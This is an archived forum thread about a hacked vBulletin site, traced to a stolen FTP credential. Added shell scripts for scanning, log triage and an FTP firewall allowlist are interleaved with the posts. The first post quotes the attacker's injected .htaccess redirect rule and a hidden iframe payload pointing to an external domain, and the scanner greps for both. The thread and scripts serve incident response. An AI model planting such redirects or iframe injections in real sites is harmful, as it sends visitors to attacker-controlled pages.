vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions

#1
01-31-2013, 08:54 AM
eteanga
Join Date: Dec 2010
Posts: 6
Looking to dig deeper into how forum was hacked

Hey,

For a second time, our forum has been hacked. The following happens:
  • .htaccess is edited to redirect all queries to another URL
  • Javascript files are appended with iFrame code
  • New .htaccess files are created in all subfolders, redirecting all queries to another URL

The .htaccess file included this new line:
Code:
RewriteRule ^.*$ http://senior-fun-shooters.de/mccd.html?h=XXX [L,R]
iFrame code looks like:
Code:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://senior-fun-shooters.de/mccd.html?j=XXX></iframe>');
Forum technical details:
  • vBulletin 4.2.0 Patch Level 3
  • vbSEO and vbSEO :: Sitemap Generator installed
  • GlowHost - Spam-O-Matic installed

This is the second time this has happened, so I suspect there's a known hack allowing these changes to be made. It could be a server permissions problem on our side too. Do you have any pointers for where this hack is already discussed?
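The three symptoms listed in the first post (a catch-all RewriteRule to an external URL, an appended document.write iframe in .js files, fresh .htaccess files in every subfolder) can be enumerated from a shell on the server without touching anything. The script below is an added example, not code from the thread or from vBulletin; it assumes a GNU or BSD find/grep and that the webroot path is passed as the first argument. It also lists world-writable files, since the later posts ask about directory permissions.

```bash
#!/bin/sh
# Added example (not from the thread or from vBulletin): a read-only scan of a
# webroot for the symptoms described in the first post. Assumes GNU/BSD find
# and grep; the webroot path is the first argument of every function.

# .htaccess files whose RewriteRule target is an absolute http(s) URL.
# vBulletin/vbSEO rules rewrite to local scripts, so an external target
# (as in the posted "RewriteRule ^.*$ http://...") stands out.
find_redirect_htaccess() {
    find "$1" -name .htaccess -type f -exec grep -lEi \
        'RewriteRule[[:space:]]+[^[:space:]]+[[:space:]]+https?://' {} \; | sort
}

# .js files that carry a document.write('<iframe ...') injection.
find_iframe_js() {
    find "$1" -name '*.js' -type f -exec grep -lEi \
        "document\.write\(['\"]<iframe" {} \; | sort
}

# .htaccess, .js and .php files modified in the last N days (default 7).
# The injected files and the new per-subfolder .htaccess files share one
# modification window, so this lists them side by side for triage.
find_recent_changes() {
    find "$1" -type f \( -name .htaccess -o -name '*.js' -o -name '*.php' \) \
        -mtime "-${2:-7}" | sort
}

# Files and directories that are world-writable (o+w). The drwxr-xr-x in the
# thread is fine; anything matched here lets any local user or service
# rewrite web content.
find_world_writable() {
    find "$1" -perm -002 | sort
}

# Stand-alone use: sh scan.sh /var/www/html/forum   (path is an assumption)
if [ "$#" -ge 1 ]; then
    echo "== redirecting .htaccess ==";   find_redirect_htaccess "$1"
    echo "== injected .js ==";            find_iframe_js "$1"
    echo "== changed in last 7 days ==";  find_recent_changes "$1"
    echo "== world-writable ==";          find_world_writable "$1"
fi
```

Run it against a copy of the webroot before cleaning anything, and keep the output together with the files' modification times: the earliest mtime among the flagged files is the best first guess for when the access happened, and it is the timestamp to look for in the access and FTP logs.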
#2
01-31-2013, 09:17 AM
betterthanyours
Join Date: May 2012
Posts: 193

Are you on dedicated or shared hosting? Sounds like the hosting environment is not secure...
#3
01-31-2013, 11:14 AM
eteanga
Join Date: Dec 2010
Posts: 6

It is on our virtual private server, so we do control the permissions (that's not to say that our permissions are all set correctly...)
#4
01-31-2013, 11:39 AM
betterthanyours
Join Date: May 2012
Posts: 193

Why don't you start with posting permissions for the directories and also the hosting environment's OS, current security modules installed, etc.?
#5
01-31-2013, 04:48 PM
eteanga
Join Date: Dec 2010
Posts: 6

Permissions for the forum folder itself, and its subfolders, are `drwxr-xr-x`.

It's running on CentOS Linux. As it's a managed server, I don't have specifics on current security modules installed.

Is what I mentioned a known security hack?

You are still of the mind that this could be prevented by correct folder permissions, am I right?
#6
01-31-2013, 05:22 PM
Lynne
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180

Have you checked your server logs to find the IP of the person who did this? Then check your access_logs for that IP and see what they did on your site.
#7
02-01-2013, 10:00 AM
betterthanyours
Join Date: May 2012
Posts: 193

Do what Lynne said also. Access and server logs will tell you how and what happened. Most website vulnerabilities are due to the host not setting up a secure environment....
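Lynne's and betterthanyours' advice (find the IP, then pull everything that IP did) is a few awk one-liners over the Apache access log. The helpers below are an added example, not code from the thread; they assume the stock "combined" log format (client IP in field 1, timestamp in field 4, method/path in fields 6 and 7, status in field 9) and embed a constructed sample log using RFC 5737 documentation addresses so the script runs offline.

```bash
#!/bin/sh
# Added example (not from the thread): awk helpers for the log triage the
# thread suggests, working on Apache "combined" format lines.
# Assumptions: stock combined layout ($1 client IP, $4 timestamp, $6 method,
# $7 path, $9 status); the log path is the first argument of every function.

# Constructed sample log (not real traffic; RFC 5737 documentation addresses).
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [31/Jan/2013:08:01:22 +0000] "GET /forum/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Jan/2013:08:01:30 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
198.51.100.77 - - [31/Jan/2013:08:03:02 +0000] "GET /forum/admincp/index.php HTTP/1.1" 302 0 "-" "curl/7.19"
198.51.100.77 - - [31/Jan/2013:08:03:09 +0000] "POST /forum/login.php HTTP/1.1" 200 311 "-" "curl/7.19"
203.0.113.5 - - [31/Jan/2013:08:10:41 +0000] "GET /forum/forumdisplay.php?f=3 HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.0.113.9 - - [31/Jan/2013:08:10:55 +0000] "GET /forum/clientscript/vbulletin_global.js HTTP/1.1" 404 219 "-" "Mozilla/5.0"
EOF
}

# Requests per client IP, busiest first: "count ip".
requests_by_ip() {
    awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# Everything one IP did: "timestamp method path status", in log order.
requests_from_ip() {
    awk -v ip="$2" '$1 == ip { print substr($4, 2), substr($6, 2), $7, $9 }' "$1"
}

# IPs that requested a path matching an awk regex (e.g. admincp, \.htaccess).
ips_hitting_path() {
    awk -v pat="$2" '$7 ~ pat { seen[$1] = 1 } END { for (ip in seen) print ip }' "$1" | sort
}

# First 404 in the log: "timestamp path", the moment the symptoms started.
first_404() {
    awk '$9 == "404" { print substr($4, 2), $7; exit }' "$1"
}

# 404s per minute: "count dd/Mon/yyyy:HH:MM", in the order minutes first appear.
count_404_by_minute() {
    awk '$9 == "404" { m = substr($4, 2, 17); if (!(m in n)) order[++k] = m; n[m]++ }
         END { for (i = 1; i <= k; i++) print n[order[i]], order[i] }' "$1"
}

# Stand-alone use: sh triage.sh /var/log/httpd/access_log   (path is an assumption)
if [ "$#" -ge 1 ]; then
    echo "== requests per IP ==";  requests_by_ip "$1"
    echo "== first 404 ==";        first_404 "$1"
    echo "== 404s per minute ==";  count_404_by_minute "$1"
fi
```

The access log only shows HTTP activity. As the thread later confirms, the files were changed over FTP, so the same timestamp window has to be checked in the FTP daemon's transfer log (and in /var/log/secure for the login), where the uploads of the .htaccess and .js files and the client IP behind them will be recorded if logging was enabled.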
#8
02-01-2013, 01:57 PM
eteanga
Join Date: Dec 2010
Posts: 6

Thanks for all the advice.

Our Apache logs certainly show the time the 404 responses began to spring up. However, there does not seem to be more access information than that. I could be wrong, of course, and we'll seek the help of an expert in the area of Linux.
#9
02-04-2013, 10:50 AM
eteanga
Join Date: Dec 2010
Posts: 6

I can confirm that this hack took place through FTP access.

That means it was not a misconfigured server or vBulletin's fault.

How the strong FTP password was cracked is another question. It was an account created specifically for a past vBulletin contractor. Either the password was brute-force guessed (which I don't suspect), or the contractor's machine or FTP communication with our server was compromised.
#10
02-04-2013, 11:35 AM
nhawk
Join Date: Jan 2011
Posts: 1,604

Lock down FTP access to allow access from only known, trusted IP addresses through your firewall. You should be able to do that through your server control panel.

And actually on a running site that isn't being updated for any reason, there's no reason to allow any FTP access to the server at all.
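nhawk's two recommendations (allow FTP only from trusted addresses, or close it entirely on a site nobody is updating) map directly onto a short iptables allowlist. The script below is an added example, not from the thread or the control panel nhawk refers to; it assumes iptables on the CentOS box and IPv4 addresses or CIDR blocks as input. It prints the rules rather than applying them, so they can be reviewed before being piped to a root shell, and an empty allowlist produces only the DROP, which is the "no FTP at all" case.

```bash
#!/bin/sh
# Added example (not from the thread): generate an iptables allowlist for the
# FTP control port. Rules are printed, not applied; review and pipe to sh as
# root. Assumptions: iptables on the CentOS host, IPv4 only, allowlist entries
# are plain IPv4 addresses or a.b.c.d/nn CIDR blocks.

# Format check for an IPv4 address or CIDR block (octet ranges are not
# validated). Anything else is rejected, so a typo or a stray shell
# metacharacter cannot end up in a script that is later fed to a root shell.
is_ipv4_or_cidr() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}(/[0-9]{1,2})?$'
}

# Print rules for one port (default 21) and a space-separated allowlist.
# An empty allowlist yields only the DROP: FTP closed to everyone.
ftp_allowlist_rules() {
    port="${1:-21}"
    list="$2"
    for src in $list; do
        if ! is_ipv4_or_cidr "$src"; then
            echo "ftp_allowlist_rules: bad address '$src'" >&2
            return 1
        fi
    done
    # Established sessions keep flowing; with the FTP conntrack helper loaded
    # (modprobe nf_conntrack_ftp) this also covers passive-mode data ports,
    # without which allowlisted clients connect but fail on every listing.
    echo "iptables -A INPUT -p tcp -m state --state ESTABLISHED,RELATED -j ACCEPT"
    for src in $list; do
        echo "iptables -A INPUT -p tcp --dport $port -s $src -j ACCEPT"
    done
    echo "iptables -A INPUT -p tcp --dport $port -j DROP"
}

# Stand-alone: sh ftp-lock.sh 21 "203.0.113.5 198.51.100.0/24" | sudo sh
if [ "$#" -ge 1 ]; then
    ftp_allowlist_rules "$1" "$2"
fi
```

Because the rules use -A they are appended after whatever the INPUT chain already holds; if an earlier rule accepts all traffic, the DROP is never reached. Check the ordering with `iptables -L INPUT -n --line-numbers` before relying on it, and remember that an allowlist does nothing about the contractor account itself: the thread's own conclusion (a leaked credential for an account that should no longer exist) is fixed by deleting that account, not by filtering where it may log in from.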
All times are GMT.
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.